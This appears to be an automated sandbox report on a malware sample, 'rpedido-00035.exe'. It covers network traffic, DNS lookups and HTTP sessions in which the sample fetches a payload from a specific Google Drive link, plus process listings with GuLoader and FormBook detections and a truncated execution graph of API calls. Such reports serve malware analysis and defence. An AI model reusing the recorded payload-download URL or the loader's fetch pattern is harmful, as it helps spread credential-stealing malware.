                                                        Oct 4, 2024 17:25:18.807288885 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.808902979 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.809134007 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.809201956 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.809417009 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.810478926 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.810713053 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.810786963 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.810996056 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.812486887 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.812702894 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.812763929 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.812951088 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.814102888 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.814326048 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.814387083 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.814546108 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.814603090 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.814857960 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.816121101 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.816287994 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.816353083 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.816565037 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.817878008 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.818054914 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.818120956 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.818316936 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.819917917 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.820137978 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.820677996 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.820926905 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.820983887 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.821212053 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.822448969 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.822730064 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.822787046 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.823026896 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.824230909 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.824389935 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.824450016 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.824708939 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.825989008 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.826209068 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.826267004 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.826477051 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.827954054 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.828151941 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.828265905 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.828480959 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.829687119 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.829926968 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.829994917 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.830277920 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.831233025 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.831511021 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.831568003 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.831862926 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.832966089 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.833161116 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.833225012 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.833372116 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.834645033 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.834937096 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.834994078 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.835257053 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.836520910 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.836803913 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.836870909 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.837138891 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.838141918 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.838470936 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.838543892 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.838803053 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.839550972 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.839766026 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.839827061 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.840059042 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.841120958 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.841375113 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.841415882 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.841572046 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.842561960 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.842823029 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.842854023 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.843013048 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.844300032 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.844561100 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.845016003 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.845277071 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.845336914 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.845618963 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.846607924 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.846874952 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.846929073 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.847187996 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.848274946 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.848459959 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.848514080 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.848814011 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.849811077 CEST44349776142.250.65.161192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 4, 2024 17:25:14.849893093 CEST | 56053 | 53 | 192.168.11.20 | 1.1.1.1
Oct 4, 2024 17:25:14.945609093 CEST | 53 | 56053 | 1.1.1.1 | 192.168.11.20
Oct 4, 2024 17:25:15.514143944 CEST | 56879 | 53 | 192.168.11.20 | 1.1.1.1
Oct 4, 2024 17:25:15.610479116 CEST | 53 | 56879 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 4, 2024 17:25:14.849893093 CEST | 192.168.11.20 | 1.1.1.1 | 0x7407 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 17:25:15.514143944 CEST | 192.168.11.20 | 1.1.1.1 | 0x2524 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 4, 2024 17:25:14.945609093 CEST | 1.1.1.1 | 192.168.11.20 | 0x7407 | No error (0) | drive.google.com | | 142.250.65.206 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 17:25:15.610479116 CEST | 1.1.1.1 | 192.168.11.20 | 0x2524 | No error (0) | drive.usercontent.google.com | | 142.250.65.161 | A (IP address) | IN (0x0001) | false
                                                        • drive.google.com
                                                        • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49775 | 142.250.65.206 | 443 | 1532 | C:\Users\user\Desktop\rpedido-00035.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-04 15:25:15 UTC | 216 | OUT | GET /uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
2024-10-04 15:25:15 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 04 Oct 2024 15:25:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-CAaZdg_8-RjHYpVZNy3lfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49776 | 142.250.65.161 | 443 | 1532 | C:\Users\user\Desktop\rpedido-00035.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-04 15:25:15 UTC | 258 | OUT | GET /download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
2024-10-04 15:25:18 UTC | 4896 | IN | HTTP/1.1 200 OK
                                                        Content-Type: application/octet-stream
                                                        Content-Security-Policy: sandbox
                                                        Content-Security-Policy: default-src 'none'
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        X-Content-Security-Policy: sandbox
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cross-Origin-Embedder-Policy: require-corp
                                                        Cross-Origin-Resource-Policy: same-site
                                                        X-Content-Type-Options: nosniff
                                                        Content-Disposition: attachment; filename="vXWIcjgFX229.bin"
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                        Accept-Ranges: bytes
                                                        Content-Length: 287808
                                                        Last-Modified: Fri, 04 Oct 2024 08:27:50 GMT
                                                        X-GUploader-UploadID: AD-8ljt05XRl21y2z0_2vshlLkvcVA0t1Qkk4SOoU0tREIECVoOiT1u5wevXZMYoaXRt6l350hVAUWIQ3Q
                                                        Date: Fri, 04 Oct 2024 15:25:18 GMT
                                                        Expires: Fri, 04 Oct 2024 15:25:18 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=gQatwQ==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close



                                                        Target ID:0
                                                        Start time:11:23:39
                                                        Start date:04/10/2024
                                                        Path:C:\Users\user\Desktop\rpedido-00035.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\rpedido-00035.exe"
                                                        Imagebase:0x400000
                                                        File size:577'872 bytes
                                                        MD5 hash:13DE5FEFD3DDA5E310CDE2FA1E6D4B32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.44559719436.0000000002908000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.44560230071.0000000003220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.44560230071.0000000003D19000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:11:25:04
                                                        Start date:04/10/2024
                                                        Path:C:\Users\user\Desktop\rpedido-00035.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\rpedido-00035.exe"
                                                        Imagebase:0x400000
                                                        File size:577'872 bytes
                                                        MD5 hash:13DE5FEFD3DDA5E310CDE2FA1E6D4B32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.44867701457.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.44867701457.0000000002159000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:11:25:42
                                                        Start date:04/10/2024
                                                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                        Imagebase:0x140000000
                                                        File size:16'696'840 bytes
                                                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:11:25:43
                                                        Start date:04/10/2024
                                                        Path:C:\Windows\SysWOW64\sethc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\sethc.exe"
                                                        Imagebase:0x2e0000
                                                        File size:81'920 bytes
                                                        MD5 hash:AA9A6E4DADA121001CFDF184B9758BBE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:11:28:16
                                                        Start date:04/10/2024
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff6c8c90000
                                                        File size:4'849'904 bytes
                                                        MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:17.3%
                                                          Dynamic/Decrypted Code Coverage:13.2%
                                                          Signature Coverage:19.7%
                                                          Total number of Nodes:1590
                                                          Total number of Limit Nodes:37
5167->5168 5169 402c37 17 API calls 5168->5169 5170 402262 5169->5170 5171 402c37 17 API calls 5170->5171 5172 40226b 5171->5172 5173 4066f3 2 API calls 5172->5173 5174 402274 5173->5174 5175 402285 lstrlenW lstrlenW 5174->5175 5176 402278 5174->5176 5178 405414 24 API calls 5175->5178 5177 405414 24 API calls 5176->5177 5180 402280 5177->5180 5179 4022c3 SHFileOperationW 5178->5179 5179->5176 5179->5180 5181 405553 5182 405574 GetDlgItem GetDlgItem GetDlgItem 5181->5182 5183 4056fd 5181->5183 5226 40437a SendMessageW 5182->5226 5185 405706 GetDlgItem CreateThread CloseHandle 5183->5185 5186 40572e 5183->5186 5185->5186 5188 405759 5186->5188 5189 405745 ShowWindow ShowWindow 5186->5189 5190 40577e 5186->5190 5187 4055e4 5192 4055eb GetClientRect GetSystemMetrics SendMessageW SendMessageW 5187->5192 5191 4057b9 5188->5191 5194 405793 ShowWindow 5188->5194 5195 40576d 5188->5195 5228 40437a SendMessageW 5189->5228 5196 4043ac 8 API calls 5190->5196 5191->5190 5201 4057c7 SendMessageW 5191->5201 5199 405659 5192->5199 5200 40563d SendMessageW SendMessageW 5192->5200 5197 4057b3 5194->5197 5198 4057a5 5194->5198 5229 40431e 5195->5229 5203 40578c 5196->5203 5205 40431e SendMessageW 5197->5205 5204 405414 24 API calls 5198->5204 5206 40566c 5199->5206 5207 40565e SendMessageW 5199->5207 5200->5199 5201->5203 5208 4057e0 CreatePopupMenu 5201->5208 5204->5197 5205->5191 5210 404345 18 API calls 5206->5210 5207->5206 5209 4063d2 17 API calls 5208->5209 5211 4057f0 AppendMenuW 5209->5211 5212 40567c 5210->5212 5213 405820 TrackPopupMenu 5211->5213 5214 40580d GetWindowRect 5211->5214 5215 405685 ShowWindow 5212->5215 5216 4056b9 GetDlgItem SendMessageW 5212->5216 5213->5203 5218 40583b 5213->5218 5214->5213 5219 4056a8 5215->5219 5220 40569b ShowWindow 5215->5220 5216->5203 5217 4056e0 SendMessageW SendMessageW 5216->5217 5217->5203 5221 405857 SendMessageW 5218->5221 5227 40437a SendMessageW 5219->5227 5220->5219 5221->5221 5222 405874 OpenClipboard EmptyClipboard 
GlobalAlloc GlobalLock 5221->5222 5224 405899 SendMessageW 5222->5224 5224->5224 5225 4058c2 GlobalUnlock SetClipboardData CloseClipboard 5224->5225 5225->5203 5226->5187 5227->5216 5228->5188 5230 404325 5229->5230 5231 40432b SendMessageW 5229->5231 5230->5231 5231->5190 5232 401956 5233 402c37 17 API calls 5232->5233 5234 40195d lstrlenW 5233->5234 5235 40258c 5234->5235 5038 4014d7 5039 402c15 17 API calls 5038->5039 5040 4014dd Sleep 5039->5040 5042 402abf 5040->5042 5236 401d57 GetDlgItem GetClientRect 5237 402c37 17 API calls 5236->5237 5238 401d89 LoadImageW SendMessageW 5237->5238 5239 401da7 DeleteObject 5238->5239 5240 402abf 5238->5240 5239->5240 5241 4022d7 5242 4022f1 5241->5242 5243 4022de 5241->5243 5244 4063d2 17 API calls 5243->5244 5245 4022eb 5244->5245 5246 405a12 MessageBoxIndirectW 5245->5246 5246->5242 5247 402dd7 5248 402e02 5247->5248 5249 402de9 SetTimer 5247->5249 5250 402e50 5248->5250 5251 402e56 MulDiv 5248->5251 5249->5248 5252 402e10 wsprintfW SetWindowTextW SetDlgItemTextW 5251->5252 5252->5250 5254 404459 lstrcpynW lstrlenW 5043 40175c 5044 402c37 17 API calls 5043->5044 5045 401763 5044->5045 5046 405ed1 2 API calls 5045->5046 5047 40176a 5046->5047 5048 405ed1 2 API calls 5047->5048 5048->5047 5061 4023de 5062 402c37 17 API calls 5061->5062 5063 4023f0 5062->5063 5064 402c37 17 API calls 5063->5064 5065 4023fa 5064->5065 5078 402cc7 5065->5078 5068 402432 5071 402c15 17 API calls 5068->5071 5073 40243e 5068->5073 5069 402885 5070 402c37 17 API calls 5074 402428 lstrlenW 5070->5074 5071->5073 5072 40245d RegSetValueExW 5076 402473 RegCloseKey 5072->5076 5073->5072 5075 4031ba 44 API calls 5073->5075 5074->5068 5075->5072 5076->5069 5079 402ce2 5078->5079 5082 40624b 5079->5082 5083 40625a 5082->5083 5084 40240a 5083->5084 5085 406265 RegCreateKeyExW 5083->5085 5084->5068 5084->5069 5084->5070 5085->5084 5262 402862 5263 402c37 17 API calls 5262->5263 5264 402869 FindFirstFileW 5263->5264 5265 402891 5264->5265 5269 40287c 
5264->5269 5270 4062f7 wsprintfW 5265->5270 5267 40289a 5271 4063b0 lstrcpynW 5267->5271 5270->5267 5271->5269 5272 4044e2 5273 4044fa 5272->5273 5280 404614 5272->5280 5277 404345 18 API calls 5273->5277 5274 40467e 5275 404748 5274->5275 5276 404688 GetDlgItem 5274->5276 5282 4043ac 8 API calls 5275->5282 5278 4046a2 5276->5278 5279 404709 5276->5279 5281 404561 5277->5281 5278->5279 5286 4046c8 SendMessageW LoadCursorW SetCursor 5278->5286 5279->5275 5287 40471b 5279->5287 5280->5274 5280->5275 5283 40464f GetDlgItem SendMessageW 5280->5283 5285 404345 18 API calls 5281->5285 5296 404743 5282->5296 5305 404367 EnableWindow 5283->5305 5289 40456e CheckDlgButton 5285->5289 5309 404791 5286->5309 5291 404731 5287->5291 5292 404721 SendMessageW 5287->5292 5288 404679 5306 40476d 5288->5306 5303 404367 EnableWindow 5289->5303 5291->5296 5297 404737 SendMessageW 5291->5297 5292->5291 5297->5296 5298 40458c GetDlgItem 5304 40437a SendMessageW 5298->5304 5300 4045a2 SendMessageW 5301 4045c8 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5300->5301 5302 4045bf GetSysColor 5300->5302 5301->5296 5302->5301 5303->5298 5304->5300 5305->5288 5307 404780 SendMessageW 5306->5307 5308 40477b 5306->5308 5307->5274 5308->5307 5312 4059d8 ShellExecuteExW 5309->5312 5311 4046f7 LoadCursorW SetCursor 5311->5279 5312->5311 5313 401563 5314 402a65 5313->5314 5317 4062f7 wsprintfW 5314->5317 5316 402a6a 5317->5316 5318 401968 5319 402c15 17 API calls 5318->5319 5320 40196f 5319->5320 5321 402c15 17 API calls 5320->5321 5322 40197c 5321->5322 5323 402c37 17 API calls 5322->5323 5324 401993 lstrlenW 5323->5324 5325 4019a4 5324->5325 5326 4019e5 5325->5326 5330 4063b0 lstrcpynW 5325->5330 5328 4019d5 5328->5326 5329 4019da lstrlenW 5328->5329 5329->5326 5330->5328 4458 4027e9 4459 4027f0 4458->4459 4461 402a6a 4458->4461 4460 402c15 17 API calls 4459->4460 4462 4027f7 4460->4462 4463 402806 SetFilePointer 4462->4463 4463->4461 4464 402816 4463->4464 4466 4062f7 wsprintfW 
4464->4466 4466->4461 5331 100018a9 5333 100018cc 5331->5333 5332 10001911 5335 10001272 2 API calls 5332->5335 5333->5332 5334 100018ff GlobalFree 5333->5334 5334->5332 5336 10001a87 GlobalFree GlobalFree 5335->5336 5337 40166a 5338 402c37 17 API calls 5337->5338 5339 401670 5338->5339 5340 4066f3 2 API calls 5339->5340 5341 401676 5340->5341 5342 404b6a 5343 404b96 5342->5343 5344 404b7a 5342->5344 5346 404bc9 5343->5346 5347 404b9c SHGetPathFromIDListW 5343->5347 5353 4059f6 GetDlgItemTextW 5344->5353 5349 404bac 5347->5349 5352 404bb3 SendMessageW 5347->5352 5348 404b87 SendMessageW 5348->5343 5351 40140b 2 API calls 5349->5351 5351->5352 5352->5346 5353->5348 5354 403e6c 5355 403e84 5354->5355 5356 403fbf 5354->5356 5355->5356 5357 403e90 5355->5357 5358 403fd0 GetDlgItem GetDlgItem 5356->5358 5359 404010 5356->5359 5360 403e9b SetWindowPos 5357->5360 5361 403eae 5357->5361 5362 404345 18 API calls 5358->5362 5363 40406a 5359->5363 5371 401389 2 API calls 5359->5371 5360->5361 5365 403eb3 ShowWindow 5361->5365 5366 403ecb 5361->5366 5367 403ffa SetClassLongW 5362->5367 5364 404391 SendMessageW 5363->5364 5384 403fba 5363->5384 5381 40407c 5364->5381 5365->5366 5368 403ed3 DestroyWindow 5366->5368 5369 403eed 5366->5369 5370 40140b 2 API calls 5367->5370 5422 4042ce 5368->5422 5372 403ef2 SetWindowLongW 5369->5372 5373 403f03 5369->5373 5370->5359 5374 404042 5371->5374 5372->5384 5377 403f0f GetDlgItem 5373->5377 5392 403f7a 5373->5392 5374->5363 5378 404046 SendMessageW 5374->5378 5375 40140b 2 API calls 5375->5381 5376 4042d0 DestroyWindow EndDialog 5376->5422 5382 403f22 SendMessageW IsWindowEnabled 5377->5382 5383 403f3f 5377->5383 5378->5384 5379 4043ac 8 API calls 5379->5384 5380 4042ff ShowWindow 5380->5384 5381->5375 5381->5376 5381->5384 5385 4063d2 17 API calls 5381->5385 5395 404345 18 API calls 5381->5395 5397 404345 18 API calls 5381->5397 5413 404210 DestroyWindow 5381->5413 5382->5383 5382->5384 5386 403f4c 5383->5386 5387 403f93 SendMessageW 
